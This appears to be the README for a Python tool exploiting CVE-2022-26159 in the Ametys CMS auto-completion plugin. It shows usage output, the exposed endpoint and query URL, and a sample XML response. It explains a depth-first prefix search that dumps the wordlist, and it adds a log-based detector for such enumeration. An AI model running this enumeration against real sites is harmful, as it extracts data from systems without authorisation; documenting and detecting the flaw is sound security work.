A Python exploit to automatically dump all the data stored by the auto-completion plugin of Ametys CMS (CVE-2022-26159) into a local SQLite database file.
- Automatic detection of the maximum number of results returned by the auto-completion plugin.
- Depth-first search to dump all the results.
- Output log file.
```
$ ./CVE-2022-26159-Ametys-Autocompletion-XML.py -h
CVE-2022-26159-Ametys-Autocompletion-XML v1.1 - by @podalirius
usage: CVE-2022-26159-Ametys-Autocompletion-XML.py [-h] -t TARGET [-H HEADERS] [-k] [-v | -q] [--no-colors]
Description message
optional arguments:
-h, --help show this help message and exit
-t TARGET, --target TARGET
arg1 help message
-H HEADERS, --header HEADERS
Specify HTTP headers to use in requests. (e.g., --header "Header1: Value1" --header "Header2: Value2")
-k, --insecure Disable SSL/TLS warnings and certificate verification.
-v, --verbose Verbose mode. (default: False)
-q, --quiet Quiet mode. (default: False)
--no-colors Disables colored output. (default: False)
```
The auto-completion plugin in Ametys CMS <= 4.4.9 publicly exposes an XML file containing a wordlist at the following address:
https://domain.tld/plugins/web/service/search/auto-completion/domain/en.xml
To query this wordlist, an attacker only needs to send the first letters of a word in the `q` (query) parameter:
https://domain.tld/plugins/web/service/search/auto-completion/domain/en.xml?q=adm
The auto-completion plugin then returns the first 10 matching words starting with `adm` (the query) in an XML document:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<auto-completion>
<item>administrateur</item>
<item>administrateurs</item>
<item>administratif</item>
<item>administratifs</item>
<item>administration</item>
<item>administrations</item>
<item>administrative</item>
<item>administratives</item>
<item>administres</item>
<item>admission</item>
</auto-completion>
```
Because the response is capped at a fixed number of results, a prefix that returns the maximum count may hide further words; an attacker therefore only needs to perform a depth-first search over the prefixes on this API to extract the entire wordlist.
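From the defender's side, the same property (a long run of one-character prefix extensions against the endpoint above) is what a depth-first dump leaves in the web server access log. The following detector is an added example, not part of this tool or of Ametys; it assumes combined-log-format lines, and the log lines and IP addresses it uses are constructed.

```python
"""Detect a depth-first walk of the Ametys auto-completion endpoint in web server access logs.
Added example, not part of this tool; the log lines and IP addresses below are constructed."""
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlparse

# Combined log format; only the client IP and the request path are used.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<path>\S+) [^"]*" \d{3}')
AUTOCOMPLETE_PATH = "/plugins/web/service/search/auto-completion/"

def parse_queries(log_text):
    """Return {client_ip: [q, ...]} for hits on the auto-completion endpoint, in log order."""
    per_ip = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlparse(m.group("path"))
        if AUTOCOMPLETE_PATH in url.path:
            per_ip[m.group("ip")].append(parse_qs(url.query).get("q", [""])[0])
    return per_ip

def count_extensions(queries):
    """Count queries that extend the previous query by exactly one character.
    A user types a few prefixes; a depth-first dump produces long runs of these."""
    return sum(1 for prev, cur in zip(queries, queries[1:])
               if len(cur) == len(prev) + 1 and cur.startswith(prev))

def flag_enumerators(log_text, min_queries=20, min_extensions=10):
    """Return {ip: stats} for clients whose volume and prefix pattern look like a dump."""
    flagged = {}
    for ip, queries in parse_queries(log_text).items():
        ext = count_extensions(queries)
        if len(queries) >= min_queries and ext >= min_extensions:
            flagged[ip] = {"queries": len(queries), "extensions": ext}
    return flagged

def _line(ip, q):  # constructed log line for the endpoint described above
    return (f'{ip} - - [10/Mar/2022:10:00:00 +0000] "GET /plugins/web/service/search/'
            f'auto-completion/domain/en.xml?q={q} HTTP/1.1" 200 512')

# Constructed sample: 203.0.113.5 walks "a", "ad", "adm", ... depth first; 198.51.100.7 does
# two ordinary lookups. Expected: {'203.0.113.5': {'queries': 20, 'extensions': 17}}
SAMPLE_LOG = "\n".join(
    [_line("203.0.113.5", "administration"[:i]) for i in range(1, 15)]
    + [_line("203.0.113.5", "admission"[:i]) for i in range(5, 10)]
    + [_line("203.0.113.5", "adn"), _line("198.51.100.7", "adm"), _line("198.51.100.7", "inscription")]
)
```

The thresholds are illustrative; tune `min_queries` and `min_extensions` to the site's normal search traffic before alerting on them.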
Pull requests are welcome. Feel free to open an issue if you want to add other features.